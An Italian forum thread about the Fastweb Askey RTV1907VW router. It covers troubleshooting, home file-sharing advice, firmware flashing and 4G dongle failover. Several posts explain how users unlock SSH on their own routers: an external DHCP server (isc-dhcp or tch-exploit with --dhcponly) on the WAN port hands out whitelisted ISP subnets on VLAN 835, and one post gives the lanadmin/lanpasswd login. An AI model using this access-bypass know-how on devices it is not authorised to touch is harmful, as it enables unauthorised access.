Ciao Gavin, da quanto riporti mi sembra che il tuo router sia diventato instabile causa componente fuori tolleranza (flash o mcu per es) - se sei sicuro che sia ben ventilato e non tappato in un buco e che non surriscaldi direi che è necessaria la sostituzione. Inoltre assicurati che nella tua rete (wifi e cablata) non ci sia magari un altro dispositivo con stesso IP assegnato staticamente ma dubito. Deduco che il problema si verifichi sia con rete cablata che via Wifi - corretto? Sembra che si crashi più di un servizio (webserver e dhcpserver) o qualcosa impedisca di raggiungerli. Per vedere se non ci sono altre stranezze nella tua rete potresti, dopo aver pingato il router, digitare arp -a da una cmd shell da WIndows per vedere se l'indirizzo MAC corrisponde a quello associato all'IP del tuo router - fallo sia quando sei connesso alla rete cablata che via wifi. Vedrai un elenco di indirizzi IP con al fianco i relativi MAC delle NIC dei dispositivi nella tua rete. Fai questo test quando funziona la navigazione e poi quando invece il router smette di assegnare indirizzi e verifica che *non sia cambiato* il MAC associato. Il fatto che con un indirizzo IP statico tu riesca ancora a navigare vuol dire che la parte di NAT/routing lato router non sia bloccata ma solo i servizi web e dhcpsrv. Potrebbe esserci qualche altro dispositivo a causare problemi (via wifi qualcuno nei paraggi che si diverte con un deauth di massa ma questo comporterebbe problemi di connessione solo in wifi e non cablata).
Comunque quando cominciano a far così (se la tua rete è a posto) non c'è altra soluzione (sai quanti ne abbiamo buttati in questi anni di router wifi dlink/linksys/netgear etc etc "fritti"). Cmq assicurati sempre che abbia abbastanza "aria" attorno dato che non usando ventilazione forzata i componenti (MCU, RAM e FLASH specialmente) vengono raffreddati con moti convettivi e basta poco a far salire la temperatura interna e quindi ridurre drasticamente la vita dei semiconduttori. In altre parole magari non si rompe subito ma la sua longevità è sicuramente ridotta. Infatti se noti, il design di questi "Ultramodem" è cambiato da orizzontale a quasi verticale, ed un motivo c'è e non è solo legato al design, è legato appunto alla migliore ventilazione passiva (a camino) necessaria a mantenere la stabilità termica.
Saluti!
-
Salve antiloplastico,
Se non l'hai ancora buttato via, posso offrirti una mano da resuscitare questo Askey?
Ho scoperto un paio di trucchi che possono essere utile, se non è stato bracciato ...
Ciao, il router ce l'ho ancora ma in questo momento non ne ho accesso (lo potrò vedere più avanti). Che trucchi hai scoperto? Se resuscitasse sarebbe fantastico.
-
Buona sera a tutti.
Dal nulla il mio router, questo bellissimo askey, ha deciso di bloccarsi a random.
- non da più indirizzi ip
- la schermata di login non viene vista ( un schermata grigia )
- se hai l'ip fissato allora navighi
- risponde al ping
- nessun modding effettuato
Per risolvere riavvio e per qualche ora si risolve. Qualche soluzione o secondo voi faccio prima a farmelo sostituire?
è successo anche a me (ancora prima che mi mettessi a giocare con ssh e simili).
Chiamando l'assistenza hanno fatto finta di aggiornarmi il firmware/resettare il router senza risolvere il problema.
mi sono segnato tutte le impostazioni e ho resettato il router utilizzando la procedura standard e il tutto è ritornato a funzionare normalmente (lo sto tutt'ora usando come router principale)
-
buonasera a tutti! sono nuovo sul forum ma vi leggo ormai da settimane. Ho accumulato penso milioni di siti salvati sui preferiti e tantissime ore di lettura e appunti ahaha
oggi è stato il gran giorno in cui mi sono messo all'opera per cercare di venirne a capo: è possibile o no ottenere SSH su fastgate Askey RTV1907VW con gli ultimissimi firmware "0.01.03_FW_200_Askey 2021 eccecc"? (versione software sempre 1.0.1b)
oggi mi sono messo a cercare di capire come funzionasse il tutto, ho capito che molte falle sono state fixate ma leggendo dalle ultime risposte pare ci siano i servizi telnet ed ssh che sono filtrati per funzionare solo su alcune subnet (tra cui deduco la 10.1.120.0/24). Leggo che avete utilizzato un server dhcp esterno sulla porta WAN per entrarvi... io ci sto provando da una serata intera e sto per crollare. Ci ho provato in tutti i modi ma non sono ancora riuscito bene a configurare il tutto mi sa. Ho provato diversi stratagemmi ma senza venirne a capo completamente.
Ho un nanopi neo2black che sto provando ad utilizzare in aggiunta ai vari sistemi pc/mac a mia disposizione e in più ho anche un secondo fastgate sempre uguale identico, stesso firmware e tutto. Tant'è che ad un certo punto ho provato a usare direttamente questo secondo fastgate come server dhcp 10.1.120.0/24 (ovviamente collegato alla wan del primo fastgate).
Che altro dire, per ora sono soltanto riuscito nmappare il router e vedere che ha quelle porte "filtered" e se provo a usare ssh e telnet non da segni di vita, pingare lo pingo. Vi lascio un paio di foto in allegato. Qualche suggerimento su che strategia attuare? eventualmente se sto sbagliando qualcosa con il dhcp mi sapreste indicare una guida migliore per farlo?
https://imgur.com/a/XpmK8SB (https://imgur.com/a/XpmK8SB)
grazie a tutti in anticipo per l'aiuto nei post precedenti e per il futuro eventualmente, questo post è stato comunque d'aiuto per me nel comprendere tante cose! fa sempre bene imparare, anche dai fallimenti ;) anche se spero di riuscire a risolvere hahahaha :P
-
Non ho mai provato direttamente con l'Askey, ma con il fastgate ZTE usavo tch-exploit come server DHCP https://github.com/BoLaMN/tch-exploit --dhcponly e --ip "59.0.121.1" con la scheda di rete del pc configurata di conseguenza e le porte telnet e ssh erano aperte
-
Non ho mai provato direttamente con l'Askey, ma con il fastgate ZTE usavo tch-exploit come server DHCP https://github.com/BoLaMN/tch-exploit --dhcponly e --ip "59.0.121.1" con la scheda di rete del pc configurata di conseguenza e le porte telnet e ssh erano aperte
interessante. potrebbe essere una prova ma vedo che questo exploit oltre ad avviare un server dhcp (tra l'altro con quella subnet che non so se è valida anche per il mio RTV, anche se probabilmente si può modificare e impostare come 10.1.120.0/24) fa partire tutto un exploit che non credo sia compatibile quindi non so se usarlo. Vedo se riesco comunque a captare qualche informazione utile da quel github. Grazie per il consiglio comunque! Spero anche che qualcuno dei vecchi ragazzi di questo topic ormai spento da mesi torni online xD
p.s. o forse intendevi che con l'argument "--dhcponly e --ip "59.0.121.1" posso far partire solo il server dhcp? e in questo caso oltre a provare questa subnet proverei anche --dhcponly e --ip "10.1.120.1"
update: ho provato in quel modo e in effetti sembra molto promettente il tool, se non fosse che rimane bloccato in attesa di ricevere richiesta dhcp da parte del fastgate schifoso! secondo me con gli ultimi firmware hanno bloccato la porta WAN in qualche modo... lascio nell'url qui di seguito uno screen per far capire meglio. che peccato comunque https://imgur.com/a/uKQ0PbL (https://imgur.com/a/uKQ0PbL)
su windows invece riesce a trovarlo, gli offro l'ip ma non viene accettato, ho messo sempre nel link di prima uno screen
-
Secondo me dovresti provare anche la subnet 59.0.121.0/24, tanto è sempre una di quelle whitelist di fastweb. Comunque no, l'exploit in se è funzionante solo su Technicolor, ti serve solo come DHCP server, scusa ma nella seconda prova non ti trovi il fastgate all'ip 10.1.120.12? Molto strano...
-
Secondo me dovresti provare anche la subnet 59.0.121.0/24, tanto è sempre una di quelle whitelist di fastweb. Comunque no, l'exploit in se è funzionante solo su Technicolor, ti serve solo come DHCP server, scusa ma nella seconda prova non ti trovi il fastgate all'ip 10.1.120.12? Molto strano...
dalla seconda prova da windows no purtroppo. va in loop la richiesta di DHCP per dargli 10.1.120.12 ma mi sa che non la accetta il router anche perché ho provato a pingarlo e niente, ho provato a scansionare con Advanced_IP_Scanner e non trova niente. BOH. ho provato anche con l'altra subnet, stessa cosa. Ovviamente ho provato anche a resettare piu volte il fastgate perché avevo letto in giro che a volte ci potevano volere anche un bel po' di reset per fargli prendere l'indirizzo subnet... molto strano. Si accettano suggerimenti :)
update: l'unica cosa che mi viene in mente è che sto con windows 11 e magari da qualche problema. sulle impostazioni ipv4 ho messo così, il gateway predefinito non si salva stranamente. https://imgur.com/a/ejYxUEu (https://imgur.com/a/ejYxUEu)
nel frattempo ho impostato così e ho ritentato. E' come se andasse in loop e gli offrisse in continuazione l'ip. ma niente non lo pinga quindi deduco non lo accetti https://imgur.com/a/eiDZe5b (https://imgur.com/a/eiDZe5b)
-
Non dovrebbe essere rilevante ma perché come Gateway e dns non metti pure 59.0.121.1?
-
Non dovrebbe essere rilevante ma perché come Gateway e dns non metti pure 59.0.121.1?
nel secondo url c'è l'immagine con l'impostazione che ho messo dopo. Se metto 59.0.121.1 come gateway non me lo fa fare, mi da errore.
mi si resetta e si cancella il gateway. se provo a farlo dalle impostazioni di windows su rete mi da proprio errore e neanche mi fa salvare. Insomma non posso mettere nella scheda lan il gateway come l'ip...
-
domanda per chiunque mi stia ascoltando :D
è possibile mantenere root e tutto anche dopo un eventuale upgrade del firmware? visto che questi ultimi vengono aggiornati direttamente da Fastweb in automatico senza avvertirti.
-
Ciao a tutti, rispondo qui visto che sembra che ci siano un sacco di persone competenti su questo apparecchio.
Per un amico con un piccolo ufficio (3 portatili) con necessità di condividere delle cartelle (file excel, word, pdf, non roba pesante tipo flussi video ecc) sto valutando di proporgli di utilizzare un hdd usb connesso al router dove mettere tutti i file e i vari pc windows monteranno la cartella condivisa con SMB (credo, devo verificare il modello del modem Fastgate RTV1907VW-D228).
Ogni sera ciascun laptop, tramite qualche utility di backup, fa una copia di backup della cartella condivisa.
Dite che la condivisione del modem potrebbe reggere questo uso?
-
Mi pare una pessima idea, fagli attivare un abbonamento M365 e configuragli una share di OneDrive sui PC.
-
Perchè pessima?
Usare la share del router come share condivisa concordo.
Ma la mia proposta è usare la share del router per il backup giornaliero, quindi non un uso stressante.
I servizi di cloud sono belli e comodi ma, soprattuto se li usi per lavoro, bisognerebbe informarsi su come viene gestita la privacy e l'accesso a quei dati.
Inoltre se dovesse mancare internet potrebbe esser un problema l'accesso ai dati.
Nonostante usi personalmente varie soluzioni di cloud storage, non è facile per una piccola realtà fare il passaggio a cloud storage
-
In effetti sarei curioso di conoscere anche io i motivi per cui il @LuKePicci formula perentorio parere negativo :smirk:
bisognerebbe informarsi su come viene gestita la privacy e l'accesso a quei dati.
Io su cloud di terzi gestisco la mia (poca) roba solo ed esclusivamente tramite preventiva crittazione.
Inoltre se dovesse mancare internet potrebbe esser un problema l'accesso ai dati.
Ipotesi tutto sommato remota ma ragionevole...anche se parliamo nel tuo caso di backup quindi in teoria dati già disponibili in locale...inoltre rimanendo in ambito di ipotesi beh potrebbe di punto in bianco dare pure problemi l'HDD...
non è facile per una piccola realtà fare il passaggio a cloud storage
Ecco forse il motivo principale che ti guida verso una soluzione locale più immediata, sono proprio le abitudini più o meno opinabili del committente...
-
Esperienza di vita vissuta. Articolando meglio il pensiero, il mantenere un polmone locale di file condivisi in rete che siano perdibili a costo zero da un momento all'altro è cosa buona, ma in situazioni lavorative con più persone che vi accedono la cosa è difficilmente gestibile ed è facile perderne il controllo (è facile che se ne abusi, anche perché ad utilizzarlo non sei tu che lo configuri). Basti pensare a problemi di editing in concorrenza o mancanza di cronologia. Tuttavia Il "pessima" è scaturito principalmente dall'idea di dare al fastgate il compito di server per la condivisione, ricordandovi che su un altro modello di fastgate a causa di un bug nel firmware, gli HD ad esso collegati venivano brutalmente svuotati, e che tali firmware buggati arrivano in automatico sul fastgate. M365 è solo un esempio valido per la strategia di base per qualsiasi cosa riguardi la condivisione e lo storage di files in ambito professionale. Qualsiasi surrogato che copra le stesse feature è altrettanto valido se ben deployato e magari gestito tramite policy su tutto l'ufficio.
-
L'accesso concorrente non avverrebbe per i file sulla share del modem/router.
Quella sarebbe solo un backup.
La soluzione ottima sarebbe sicuramente appoggiarsi a un fornitore di cloud storage, cosí la possibilità di perdere i dati sarebbe quasi 0.
Buono a sapersi del bug sulla gestione dell'hdd collegato :(
Per un futuro mi informerò sui cloud storage provider per quanto riguarda l'accesso (anche da parte di bot) ai dati salvati.
Grazie
-
Ci sono i client di sincronizzazione per Linux che puoi installare anche su un nas così da avere una cache locale in caso di disconnessione dalla rete. Il senso di questa opzione sta nel fatto di poter dire al nas di scaricare continuamente una copia locale aggiornata (non giornalmente, ma proprio di continuo), e dire ai pc di eliminare le copie locali di file vecchi. Da quando in windows 8.1 aggiungero questa possibilità oramai chi la usa ne è assuefatto. Si può fare anche senza 365 con account personale, funziona anche su mac e volendo puoi aggiungere un filtro sul filesystem per fare da ulteriore layer crittografico su tipi di file per cui sei disposto a perdere le funzionalita di collaborazione e condivisione. Il nas conserverebbe però solo copie crittografate
-
Dopo aver letto la discussione, mi sembra di capire che l'unico modo per avere openwrt su questo router è programmare da zero l'eeprom o sbaglio? Se sì. qualcuno ci ha provato?
-
è successo anche a me (ancora prima che mi mettessi a giocare con ssh e simili).
Chiamando l'assistenza hanno fatto finta di aggiornarmi il firmware/resettare il router senza risolvere il problema.
mi sono segnato tutte le impostazioni e ho resettato il router utilizzando la procedura standard e il tutto è ritornato a funzionare normalmente (lo sto tutt'ora usando come router principale)
Dopo quasi un anno il problema si è ripresentato!
i servizi esposti su internet funzionano ma la rete interna invece non funziona a dovere: wifi è attiva ma dhcp non fornisce indirizzi, se si impostano fissi funziona ma la UI del modem non funziona.
Dopo uno spegni/riaccendi il tutto torna a funzionare ma dopo x minuti/ore torna a non funzionare
Ho resettato il modem da UI e copiato le impostazioni (a mano) rimettendo le stesse che avevo prima ora funziona tutto
tutte le modifiche fatte per avere accesso ssh e cambio DNS funzionano
se dovesse riaccadere (l'anno prossimo spero !) mi metterò a guardare i log per capire come risolvere senza resettare le impostazioni.
buonasera a tutti! sono nuovo sul forum ma vi leggo ormai da settimane. Ho accumulato penso milioni di siti salvati sui preferiti e tantissime ore di lettura e appunti ahaha
oggi è stato il gran giorno in cui mi sono messo all'opera per cercare di venirne a capo: è possibile o no ottenere SSH su fastgate Askey RTV1907VW con gli ultimissimi firmware "0.01.03_FW_200_Askey 2021 eccecc"? (versione software sempre 1.0.1b)
anche io mi ero bloccato in quella situazione.
è bastato sconnettere il modem dalla linea telefonica, accenderlo con il pc con server dhcp connesso sulla porta wan e poi seguire la procedura.
-
Ciao a tutti, ma alla fine è ancora possibile mettere openwrt su questo router? Purtroppo molti link sono morti o rimandano a degli hack fixati nelle ultime versioni :(
Ciao e grazie!
-
Ciao a tutti, ma alla fine è ancora possibile mettere openwrt su questo router? Purtroppo molti link sono morti o rimandano a degli hack fixati nelle ultime versioni :(
Ciao e grazie!
Hanno fixato anche la procedura che avevo scritto dello sblocco via SSH e server DHCP? In che modo? Comunque cgià avere una shell completa secondo me vuol dire molto: alla fine basta andare nei repo di OpenWRT e scaricarsi i pacchetti che servono (rognoso doversi cercare le dipendenze, ma credo fattibilie). Comunque installarci OpenWRT sarebbe una bella cosa.
-
Hanno fixato anche la procedura che avevo scritto dello sblocco via SSH e server DHCP? In che modo? Comunque cgià avere una shell completa secondo me vuol dire molto: alla fine basta andare nei repo di OpenWRT e scaricarsi i pacchetti che servono (rognoso doversi cercare le dipendenze, ma credo fattibilie). Comunque installarci OpenWRT sarebbe una bella cosa.
Ho provato la tua procedura ma il Fastgate non si prende l'indirizzo IP, vedendo con Wireshark sembra che il DHCP discover lo faccia sulla VLAN 835, ti ricordi se hai dovuto impostarla nel tuo caso?
-
Ho provato la tua procedura ma il Fastgate non si prende l'indirizzo IP, vedendo con Wireshark sembra che il DHCP discover lo faccia sulla VLAN 835, ti ricordi se hai dovuto impostarla nel tuo caso?
Il server dhcp come l'hai fatto? Hai impostato che dia gli IP giusti? Hai collegato il FastGate alla porta WAN? In caso prova a vedere se collegando un altro dipositivo la cosa funziona.
-
Il server dhcp come l'hai fatto? Hai impostato che dia gli IP giusti? Hai collegato il FastGate alla porta WAN? In caso prova a vedere se collegando un altro dipositivo la cosa funziona.
Ho risolto, alla fine mancava la VLAN 835 che a quanto pare il FastGate che ho io la vuole :computerrage: (ho firmware 0.01.03_FW_200_Askey), metto anche l'output tcpdump:
18:53:52.249192 78:29:xx:xx:xx:xx > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 355: vlan 835, p 0, ethertype IPv4, (tos 0xa0, ttl 64, id 0, offset 0, flags [none], proto UDP (17), length 337)
0.0.0.0.68 > 255.255.255.255.67: [udp sum ok] BOOTP/DHCP, Request from 78:29:xx:xx:xx:xx, length 309, xid 0x4e161d18, secs 486, Flags [none] (0x0000)
Client-Ethernet-Address 78:29:xx:xx:xx:xx
Vendor-rfc1048 Extensions
Magic Cookie 0x63825363
DHCP-Message Option 53, length 1: Discover
Client-ID Option 61, length 7: ether 78:29:xx:xx:xx:xx
MSZ Option 57, length 2: 576
Parameter-Request Option 55, length 9:
Subnet-Mask, Default-Gateway, Domain-Name-Server, Hostname
Domain-Name, BR, NTP, Vendor-Option
Option 212
Vendor-Class Option 60, length 39: "askey_HW_ES1_SW_0.01.03dbg/dslforum.org"
END Option 255, length 0
Il DHCP Server è un normalissimo isc-dhcp fatto su una CentOS 7, avevo anche provato con tch-exploit usando il flag --dhcponly ma non cambiava nulla, voleva proprio la VLAN come si può vedere dal tcpdump :) come subnet ho usato la 10.1.120.0/24
-
Ottimo, sei riuscito a sbloccare l'accesso SSH completo?
-
mi sono accorto di non averti risposto, si si sono riuscito a sbloccare l'accesso completo a SSH, la tua procedura funziona ancora alla grande, grazie!
-
Ciao ragazzi, ritorno dopo qualche tempo per chiedere se qualcuno è riuscito ad installare qualche GUI personalizzata (ad esempio quella di Ansuel) su questo router.
-
Ho risolto, alla fine mancava la VLAN 835 che a quanto pare il FastGate che ho io la vuole :computerrage: (ho firmware 0.01.03_FW_200_Askey), metto anche l'output tcpdump:
18:53:52.249192 78:29:xx:xx:xx:xx > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 355: vlan 835, p 0, ethertype IPv4, (tos 0xa0, ttl 64, id 0, offset 0, flags [none], proto UDP (17), length 337)
0.0.0.0.68 > 255.255.255.255.67: [udp sum ok] BOOTP/DHCP, Request from 78:29:xx:xx:xx:xx, length 309, xid 0x4e161d18, secs 486, Flags [none] (0x0000)
Client-Ethernet-Address 78:29:xx:xx:xx:xx
Vendor-rfc1048 Extensions
Magic Cookie 0x63825363
DHCP-Message Option 53, length 1: Discover
Client-ID Option 61, length 7: ether 78:29:xx:xx:xx:xx
MSZ Option 57, length 2: 576
Parameter-Request Option 55, length 9:
Subnet-Mask, Default-Gateway, Domain-Name-Server, Hostname
Domain-Name, BR, NTP, Vendor-Option
Option 212
Vendor-Class Option 60, length 39: "askey_HW_ES1_SW_0.01.03dbg/dslforum.org"
END Option 255, length 0
Il DHCP Server è un normalissimo isc-dhcp fatto su una CentOS 7, avevo anche provato con tch-exploit usando il flag --dhcponly ma non cambiava nulla, voleva proprio la VLAN come si può vedere dal tcpdump :) come subnet ho usato la 10.1.120.0/24
Non potevi darmi notizia più bella! Mi metto subito a riprovarci e cercare di capire perché non ci riuscivo. Vado con isc-dhcp allora, tchexploit mi dava problemi e mi si buggava pure se provavo a usare --dhcponly. Potrei chiederti un riassunto velocissimo sulla procedura? qualche settaggio in particolare per il config di isc-dhcp magari
-
Ciao ragazzi, ho letto più o meno tutti i messaggi, ma capendone poco o nulla, vi volevo chiedere se ci fosse una guida dettagliata per installare OpenWRt su Askey RTV1907...
Forse conviene rinunciarci e prendere un modem a poco prezzo più semplice da modificare?
Grazie in anticipo
-
Non c'è una guida perchè non è al momento possibile e non è detto che lo sarà mai.
-
va bene, allora nulla, proverò con il TG789vac Xtream 35b anche se meno prestante, sperando sia fattibile
-
Ho risolto, alla fine mancava la VLAN 835 che a quanto pare il FastGate che ho io la vuole :computerrage: (ho firmware 0.01.03_FW_200_Askey), metto anche l'output tcpdump:
18:53:52.249192 78:29:xx:xx:xx:xx > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 355: vlan 835, p 0, ethertype IPv4, (tos 0xa0, ttl 64, id 0, offset 0, flags [none], proto UDP (17), length 337)
0.0.0.0.68 > 255.255.255.255.67: [udp sum ok] BOOTP/DHCP, Request from 78:29:xx:xx:xx:xx, length 309, xid 0x4e161d18, secs 486, Flags [none] (0x0000)
Client-Ethernet-Address 78:29:xx:xx:xx:xx
Vendor-rfc1048 Extensions
Magic Cookie 0x63825363
DHCP-Message Option 53, length 1: Discover
Client-ID Option 61, length 7: ether 78:29:xx:xx:xx:xx
MSZ Option 57, length 2: 576
Parameter-Request Option 55, length 9:
Subnet-Mask, Default-Gateway, Domain-Name-Server, Hostname
Domain-Name, BR, NTP, Vendor-Option
Option 212
Vendor-Class Option 60, length 39: "askey_HW_ES1_SW_0.01.03dbg/dslforum.org"
END Option 255, length 0
Il DHCP Server è un normalissimo isc-dhcp fatto su una CentOS 7, avevo anche provato con tch-exploit usando il flag --dhcponly ma non cambiava nulla, voleva proprio la VLAN come si può vedere dal tcpdump :) come subnet ho usato la 10.1.120.0/24
(https://i.imgur.com/jacwEOt.png)
qualche idea sul perché non riesco a dargli tramite WAN e Subnet 10.1.120.0/24 l'indirizzo?
glielo offre ma non lo accetta. il DHCP Server dovrebbe essere ok. L'altro mio pc collegato pure lui lo riceve e lo accetta, già testato. Con TCPDUMP (foto sopra) non mi risulta nessuna richiesta di VLAN, o almeno credo. Non sono molto ferrato ma ci sto provando e riprovando. Ho provato a resettare il router e tutte le prove di questo mondo. (Ovviamente è scollegato dalla rete, è collegato direttamente in lan al mio pc e basta)
-
(https://i.imgur.com/jacwEOt.png)
qualche idea sul perché non riesco a dargli tramite WAN e Subnet 10.1.120.0/24 l'indirizzo?
glielo offre ma non lo accetta. il DHCP Server dovrebbe essere ok. L'altro mio pc collegato pure lui lo riceve e lo accetta, già testato. Con TCPDUMP (foto sopra) non mi risulta nessuna richiesta di VLAN, o almeno credo. Non sono molto ferrato ma ci sto provando e riprovando. Ho provato a resettare il router e tutte le prove di questo mondo. (Ovviamente è scollegato dalla rete, è collegato direttamente in lan al mio pc e basta)
ragazzi alla fine non andava in nessun modo, volevo ringraziare @Dark-Vex per i consigli e l'aiuto in P.M. ma ahimè non andava. Fortuna ha voluto che avevo un DGA4131 / VBNT-O in ufficio e sono riuscito a sbloccare quello con estrema facilità e ho già tutto funzionante, compreso la gui di Ansuel :D
-
salve a tutti. Volevo confermare che impostando la VLAN835 si può usare una subnet come 10.1.120.0/24 e ottenere accesso SSH con lanadmin - lanpasswd e poi tramite le varie tecniche spiegate in precedenza ottenere una bash con output leggibile. Sto ancora cercando di capire come abilitare l'accesso tramite "admin" che dovrebbe avere più privilegi rispetto a lanadmin. Devo dire che fa molto schifo rispetto a openWRT xD è difficilissimo da capire
-
Ciao a tutti,
sono riuscito a caricare il firmware di uno Zyxel (C3000Z) e di un Asus (DSL-AC87VG).
Ho trovato delle immagini in giro e sono riuscito a flasharle con pendrive + terminale.
è necessario saldare la uart per impartire i comandi, altrimenti con il CFE (simile a U-boot) non ci parlate.
la versione del firmware usata è la 0.47
caricando un firmware non askey, non risulta problematico caricare firmware tramite la pagina di recovery (purchè siano realizzati con l'SDK broadcom).
Se qualcuno è interessato ad uno sviluppo, vi spiego la procedura in privato, preferisco non postare la procedura sul forum al momento.
devo fare il tentativo su un firmware più recente, qualcuno ha i firmware salvati da qualche parte? il link postato qualche tempo fa non è più raggiungibile.
Grazie
-
Ciao a tutti, qualcuno per caso ha i firmare 0.00.267_FW_200_Askey e 0.00.167_FW_200_Askey da condividere? Purtroppo sui server non sono più presenti. Grazie in anticipo
-
ciao, rispolvero questo modem dopo averlo abbandonato qualche anno fa essendo passato a tim
ora mi hanno portato la fibra FTTH e mi tornerebbe comodo ma vorrei rimanere in TIM
ho scritto a Z0rr8 per capire come ha fatto a flashare firmware via CFE, vorrei provare a flashare quello del dlink DVA-5593 che sembra avere lo stesso identico chipset broadcom
-
Buongiorno a tutti, vedo che questo thread è frequentato da gente preparatissima.
Ho per le mani il modem/router in oggetto, frutto di un recesso. Mi piacerebbe sapere quali chiavette Internet Key 4G siano compatibili plug and play con il suddetto. Infatti la mia idea sarebbe di usarlo come hotspot in vacanza. Lo so che per la stessa cosa può usarsi una saponetta 4G-WiFi (ne ho già una) ma mi intrigava l'idea, senza nessun bisogno di mod, di usare il modem come router in vacanza.
So che monta linux, ma cercando in giro per Internet non sono riuscito a capire quali chiavette 4G siano quelle che lui possa digerire. Onestamente mettermi a ordinare su Am**on e restituire decine di modelli non mi garba molto. Userei una SIM Wind o Ho.Mobile, ergo è escluso provare chiavette marchiate Fastweb; temo che quelle siano bloccate sull'operatore..
Mi basta anche uno o due esempi che abbiano funzionato a qualcuno di voi. Non pretendo una esaustiva lista di tutte le chiavette (se nè Fastweb nè Askey l'hanno mai prodotta, ce ne faremo una ragione)
:)
Grazie mille!
Macco
-
ciao, rispolvero questo modem dopo averlo abbandonato qualche anno fa essendo passato a tim
ora mi hanno portato la fibra FTTH e mi tornerebbe comodo ma vorrei rimanere in TIM
ho scritto a Z0rr8 per capire come ha fatto a flashare firmware via CFE, vorrei provare a flashare quello del dlink DVA-5593 che sembra avere lo stesso identico chipset broadcom
Ciao, non è possibile flashare firmware criptati su quel modem. il flash funziona solo su firmware molto vecchi via seriale, con l'eseguibile sysupgrade, carichi un fw in /tmp e se il modem non fa obbiezioni lo flahsa.
Non ricordo la procedura di flash via CFE (bloccata anche quella sulle nuove versioni).
I fw dlink non possono essere flashati in quanto sono dei file .sig criptati da dlink, qualora riuscissi a decriptarlo e tirare fuori un bin, il modem potrebbe bloccarti nelle operazioni di flash perchè non gli piace la firma oppure, il modem flasha tutto, parte il fw ma non riesci ad accedere alla pagina di configurazione perchè la password non è admin admin ma generata in automatico basandosi su alcune variabili scritte sul firmware.
qualora le credenziali siano admin/admin, nessuno ti garantisce che il wifi funzioni correttamente e tutte le periferiche rilevate siano al loro posto.
Con il firmware di un operatore, riuscivo a vedere le reti wireless broadcastate al contrario (sulla 5Ghz la rete si chiamava Vattelappesca_2,4, sulla 2,4ghz si chiamava Vattelappesca_5G), in più, non potevo accedere perchè la password era autogenerata ed impossibile da recuperare.
Con il firmware Merlin di ASUS, funzionava solo la parte ethernet e a tratti quella wifi (NO SFP NO xDSL), in più al riavvio cancellava tutto, perchè i block della memoria erano differenti dall'askey e salvava la conf sulla ram.
tutta sta roba per dirvi: se volete utilizzarlo con un altro operatore/linea diversa da quella del contratto di attivazione, prendetelo e buttatelo perchè non ne vale assolutamente la pena perderci tempo su un prodotto complicato e arrivato alla sua End Of Life. (OpenWrt non è installabile in quanto basato su chipset broadcom, dove mancano i driver per poter compilare il FW).
Se volete usarlo come switch, access point wifi, o qualsiasi altra cosa che non comporti la funzione primaria di modem per la linea internet, potete sfruttaro per quel che riesce ad offrire.
-
Buongiorno a tutti, vedo che questo thread è frequentato da gente preparatissima.
Ho per le mani il modem/router in oggetto, frutto di un recesso. Mi piacerebbe sapere quali chiavette Internet Key 4G siano compatibili plug and play con il suddetto. Infatti la mia idea sarebbe di usarlo come hotspot in vacanza. Lo so che per la stessa cosa può usarsi una saponetta 4G-WiFi (ne ho già una) ma mi intrigava l'idea, senza nessun bisogno di mod, di usare il modem come router in vacanza.
So che monta linux, ma cercando in giro per Internet non sono riuscito a capire quali chiavette 4G siano quelle che lui possa digerire. Onestamente mettermi a ordinare su Am**on e restituire decine di modelli non mi garba molto. Userei una SIM Wind o Ho.Mobile, ergo è escluso provare chiavette marchiate Fastweb; temo che quelle siano bloccate sull'operatore..
Mi basta anche uno o due esempi che abbiano funzionato a qualcuno di voi. Non pretendo una esaustiva lista di tutte le chiavette (se nè Fastweb nè Askey l'hanno mai prodotta, ce ne faremo una ragione)
:)
Grazie mille!
Macco
ciao proprio in questi giorni ho avuto un grosso disservizio alla linea internet e ho pensato ad un fallback su una linea 4g
Ho appena attivato una sim di prova e ho 2 chiavette usb una 3g e l'altra 4g
Per ora ho solamente infilato nella presa usb la chiavetta e dmesg mi dice che è stato connesso un modem ma più in la di così non sono ancora andato.
Ho già "moddato" alcuni servizi di questo router (firewall e dnrd) per cui forse volendo qualcosa si può fare.
Ovviamente mai nessuno ha feedback di chiavette e/o configurazioni funzionanti.
C'è solamente un bel video di fastweb dove presenta la funzionalità e basta.
Ad una prima occhiata il sistema sembra abbia riconosciuto la mia chiavetta 3g della huawei:
Bus=03 Lev=01 Prnt=01 Port=01 Cnt=01 Dev#= 3 Spd=480 MxCh= 0
Ver= 2.00 Cls=00(>ifc ) Sub=00 Prot=00 MxPS=64 #Cfgs= 1
Vendor=12d1 ProdID=1001 Rev= 1.02
Manufacturer=HUAWEI
Product=HUAWEI HiLink
#Ifs= 3 Cfg#= 1 Atr=80 MxPwr=500mA
If#= 0 Alt= 0 #EPs= 3 Cls=ff(vend.) Sub=ff Prot=ff Driver=option
Ad=81(I) Atr=03(Int.) MxPS= 64 Ivl=2ms
Ad=82(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms
Ad=01(O) Atr=02(Bulk) MxPS= 512 Ivl=4ms
If#= 1 Alt= 0 #EPs= 2 Cls=ff(vend.) Sub=ff Prot=ff Driver=option
Ad=83(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms
Ad=02(O) Atr=02(Bulk) MxPS= 512 Ivl=4ms
If#= 2 Alt= 0 #EPs= 2 Cls=ff(vend.) Sub=ff Prot=ff Driver=option
Ad=84(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms
Ad=03(O) Atr=02(Bulk) MxPS= 512 Ivl=4ms
e il programma che viene eseguito per riconoscere tali chiavette si chiama usb_modeswitch (https://www.draisberghof.de/usb_modeswitch/#usage)
appena riesco imposto i dati di connessione e ne verifico il funzionamento
-
nonostante la prima chiavetta non abbia mai funzionato la seconda invece si
è una Alcatel One Touch serie Link Key IK41VE1-2AALIT1
dalla UI puoi impostare APN (io ho tolto il pin per cui metto solo quel dato)
e hai la possibilità di provare la connessione in manuale (decidi tu di usare il 4g al posto della linea telefonica)
oppure in automatico (quando la linea telefonica non funziona passa al 4g)
ovviamente nella UI resta la scritta "disconnesso" ma la chiavetta funziona
attenzione che la chiavetta si autoassegna 192.168.1.1 per cui meglio usare un altro indirizzo per il router e (solo quando è connessa) si può accedere alla sua UI al suddetto indirizzo
non ho ancor testato per bene poichè a casa mia la linea 4g è veramente scarsa (devo trovare soluzione di posizionamento) ma il failover funziona (provato a scollegare rj11 della linea telefonica)